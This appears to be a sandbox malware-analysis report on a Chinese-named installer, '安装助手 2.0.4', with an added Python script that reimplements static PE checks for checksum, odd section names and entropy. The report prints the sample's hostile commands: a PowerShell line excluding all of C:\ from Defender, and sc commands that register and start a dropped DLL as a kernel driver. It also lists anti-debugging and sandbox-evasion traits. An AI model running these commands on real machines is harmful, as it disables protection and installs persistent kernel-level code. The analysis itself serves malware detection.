Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Window found: window name: TMainForm
Source: Window Recorder  Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe  Static file information: File size 5707417 > 1048576
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe  Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1819516942.0000000003920000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1819340678.0000000003720000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exe  Code function: 10_2_00B557D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_00B557D0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe  Static PE information: real checksum: 0x0 should be: 0x57517c
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.5.dr  Static PE information: real checksum: 0x0 should be: 0x343a15
Source: update.vac.1.dr  Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: update.vac.6.dr  Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.dr  Static PE information: real checksum: 0x0 should be: 0x343a15
Source: hrsw.vbc.6.dr  Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: tProtect.dll.12.dr  Static PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe  Static PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.dr  Static PE information: section name: .didata
Source: update.vac.1.dr  Static PE information: section name: .00cfg
Source: update.vac.1.dr  Static PE information: section name: .voltbl
Source: update.vac.1.dr  Static PE information: section name: .=~
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.5.dr  Static PE information: section name: .didata
Source: 7zr.exe.6.dr  Static PE information: section name: .sxdata
Source: update.vac.6.dr  Static PE information: section name: .00cfg
Source: update.vac.6.dr  Static PE information: section name: .voltbl
Source: update.vac.6.dr  Static PE information: section name: .=~
Source: is-AQRNC.tmp.6.dr  Static PE information: section name: .xdata
Source: hrsw.vbc.6.dr  Static PE information: section name: .00cfg
Source: hrsw.vbc.6.dr  Static PE information: section name: .voltbl
Source: hrsw.vbc.6.dr  Static PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Code function: 6_2_6C0C86EB push ecx; ret 6_2_6C0C86FE
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Code function: 6_2_6BF70F00 push ss; retn 0001h 6_2_6BF70F0A
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Code function: 6_2_6C196F10 push eax; ret 6_2_6C196F2E
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Code function: 6_2_6C0FB9F4 push 004AC35Ch; ret 6_2_6C0FBA0E
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Code function: 6_2_6C197290 push eax; ret 6_2_6C1972BE
Source: C:\Program Files (x86)\Windows NT\7zr.exe  Code function: 10_2_00AD45F4 push 00B7C35Ch; ret 10_2_00AD460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe  Code function: 10_2_00B6FB10 push eax; ret 10_2_00B6FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe  Code function: 10_2_00B6FE90 push eax; ret 10_2_00B6FEBE
Source: update.vac.1.dr  Static PE information: section name: .=~ entropy: 7.19316283520878
Source: update.vac.6.dr  Static PE information: section name: .=~ entropy: 7.19316283520878
Source: hrsw.vbc.6.dr  Static PE information: section name: .=~ entropy: 7.19316283520878
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  File created: C:\Users\user\AppData\Local\Temp\is-V2BM7.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  File created: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  File created: C:\Program Files (x86)\Windows NT\trash (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  File created: C:\Users\user\AppData\Local\Temp\is-V2BM7.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe  File created: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe  File created: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  File created: C:\Users\user\AppData\Local\Temp\is-PMC4V.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  File created: C:\Program Files (x86)\Windows NT\7zr.exe
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  File created: C:\Users\user\AppData\Local\Temp\is-PMC4V.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe  File created: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  File created: C:\Program Files (x86)\Windows NT\is-AQRNC.tmp
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  File created: C:\Users\user\AppData\Local\Temp\is-V2BM7.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  File created: C:\Users\user\AppData\Local\Temp\is-PMC4V.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  File created: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
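The static rows above rest on three checks: the PE header checksum (the Inno Setup stubs and `update.vac`/`hrsw.vbc` carry 0x0, which many third-party toolchains leave unset, while `tProtect.dll`, the file registered as a kernel driver, carries a non-zero value that does not match its contents, which points to modification after linking), section names outside the usual character set (`.=~`), and a section whose Shannon entropy is above 7 bits per byte (`.=~` at 7.19), the usual sign of packed or encrypted data. The script below is an added example, not Joe Sandbox code, that reimplements those three checks without third-party modules. The checksum routine follows the PE checksum algorithm (imagehlp-style 32-bit sum with carry folding, the checksum field itself skipped, plus the file length). The sample image is constructed in the script: a minimal PE32+ with a zero checksum, a constant `.text` section and a `.=~` section filled with SHA-256 output to stand in for packed data. The 7.0 entropy threshold and the section-name character class are this example's own choices.

```python
"""Static PE checks behind the report's checksum and section findings.

Added example (not Joe Sandbox code). The sample image is constructed
here; the checksum routine follows the PE (imagehlp) checksum algorithm.
"""
import hashlib
import math
import re
import struct
from collections import Counter
from typing import List, NamedTuple, Tuple


class Section(NamedTuple):
    name: str
    virtual_address: int
    virtual_size: int
    raw_offset: int
    raw_size: int
    characteristics: int


SAFE_NAME_RE = re.compile(r"^\.?[A-Za-z0-9_$]+$")   # example's own notion of a "normal" section name


def parse_headers(data: bytes) -> Tuple[int, List[Section]]:
    """Return (file offset of OptionalHeader.CheckSum, section table)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24                       # optional header follows the 20-byte COFF header
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("latin-1")
        vsize, va, rawsize, rawoff = struct.unpack_from("<IIII", data, off + 8)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append(Section(name, va, vsize, rawoff, rawsize, chars))
    return opt + 64, sections                 # CheckSum sits at +64 in both PE32 and PE32+


def pe_checksum(data: bytes, checksum_off: int) -> int:
    """PE checksum: sum of 32-bit words with carry folding, skipping the field itself."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for i in range(0, len(padded), 4):
        if i == checksum_off:
            continue
        total += struct.unpack_from("<I", padded, i)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def stored_checksum(data: bytes) -> int:
    off, _ = parse_headers(data)
    return struct.unpack_from("<I", data, off)[0]


def fix_checksum(data: bytes) -> bytes:
    """Return a copy with the correct checksum written into the header."""
    off, _ = parse_headers(data)
    out = bytearray(data)
    struct.pack_into("<I", out, off, pe_checksum(data, off))
    return bytes(out)


def shannon_entropy(blob: bytes) -> float:
    if not blob:
        return 0.0
    n = len(blob)
    return -sum(c / n * math.log2(c / n) for c in Counter(blob).values())


def section_name_is_odd(name: str) -> bool:
    return not SAFE_NAME_RE.match(name)


def static_checks(data: bytes, entropy_threshold: float = 7.0) -> List[str]:
    """Reproduce the report's three static findings for one image."""
    checksum_off, sections = parse_headers(data)
    stored = struct.unpack_from("<I", data, checksum_off)[0]
    computed = pe_checksum(data, checksum_off)
    findings = []
    if stored != computed:
        findings.append(f"checksum: real 0x{stored:x} should be 0x{computed:x}")
    for s in sections:
        raw = data[s.raw_offset:s.raw_offset + s.raw_size]
        if section_name_is_odd(s.name):
            findings.append(f"section name with special chars: {s.name!r}")
        ent = shannon_entropy(raw)
        if ent >= entropy_threshold:
            findings.append(f"high-entropy section {s.name!r}: {ent:.2f} bits/byte")
    return findings


def build_sample_pe() -> bytes:
    """Constructed minimal PE32+: two sections, CheckSum deliberately left at 0."""
    buf = bytearray(0x600)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)                                   # e_lfanew
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", buf, 0x44, 0x8664, 2, 0, 0, 0, 240, 0x0022)   # COFF header, 2 sections
    opt = 0x58
    struct.pack_into("<H", buf, opt, 0x20B)                                   # PE32+ magic
    struct.pack_into("<I", buf, opt + 60, 0x200)                              # SizeOfHeaders
    struct.pack_into("<I", buf, opt + 64, 0)                                  # CheckSum = 0
    struct.pack_into("<HH", buf, opt + 68, 2, 0x0160)                         # Subsystem, DllCharacteristics
    struct.pack_into("<I", buf, opt + 108, 16)                                # NumberOfRvaAndSizes
    for i, (name, raw_off, chars) in enumerate(((b".text", 0x200, 0x60000020), (b".=~", 0x400, 0xE0000040))):
        off = opt + 240 + 40 * i
        buf[off:off + 8] = name.ljust(8, b"\0")
        struct.pack_into("<IIII", buf, off + 8, 0x200, 0x1000 * (i + 1), 0x200, raw_off)
        struct.pack_into("<I", buf, off + 36, chars)
    buf[0x200:0x400] = b"\xCC" * 0x200                                        # constant bytes: entropy 0
    buf[0x400:0x600] = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(16))  # stand-in for packed data
    return bytes(buf)


if __name__ == "__main__":
    sample = build_sample_pe()
    for line in static_checks(sample):
        print(line)
    print("after fix_checksum:", static_checks(fix_checksum(sample)))
```

Running it prints a checksum mismatch in the report's own wording, the `.=~` name finding and the entropy finding for `.=~` only; after `fix_checksum` the checksum line disappears and the two section findings remain, which is the point: a zero checksum is cheap to fix and weak as evidence, while the section anomalies survive.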

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6399
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3256
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Window / User API: threadDelayed 530
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Window / User API: threadDelayed 533
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Window / User API: threadDelayed 505
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-V2BM7.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-V2BM7.tmp\_isetup\_setup64.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-PMC4V.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-PMC4V.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-AQRNC.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe API coverage: 7.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Code function: 6_2_6C0BAEC0 FindFirstFileA,FindClose,FindClose, 6_2_6C0BAEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AD6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 10_2_00AD6868
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AD7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 10_2_00AD7496
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AD9C60 GetSystemInfo, 10_2_00AD9C60
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000002.1795152504.000000000178C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Code function: 6_2_6BF43886 NtSetInformationThread 00000000,00000011,00000000,00000000 6_2_6BF43886
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Code function: 6_2_6C0D0181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6C0D0181
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B557D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 10_2_00B557D0
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Code function: 6_2_6C0D9D35 mov eax, dword ptr fs:[00000030h] 6_2_6C0D9D35
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Code function: 6_2_6C0D9D66 mov eax, dword ptr fs:[00000030h] 6_2_6C0D9D66
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Code function: 6_2_6C0CF17D mov eax, dword ptr fs:[00000030h] 6_2_6C0CF17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Code function: 6_2_6C0C8CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_6C0C8CBD

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: tProtect.dll.12.dr Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp Code function: 6_2_6C197700 cpuid 6_2_6C197700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00ADAB2A GetSystemTimeAsFileTime,10_2_00ADAB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B70090 GetVersion,10_2_00B70090
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
MITRE ATT&CK Matrix

Techniques flagged for this sample, grouped by tactic. The number in parentheses is the count badge as it appears in the matrix (badge digits were run together by the extraction, so "231" is reproduced as extracted). Matrix cells that carried no count are the unflagged template entries and are omitted.

Execution: Windows Management Instrumentation (1), Command and Scripting Interpreter (2), Service Execution (1), Native API (1)
Persistence: Windows Service (1), DLL Side-Loading (1)
Privilege Escalation: Access Token Manipulation (1), Windows Service (1), Process Injection (111), DLL Side-Loading (1)
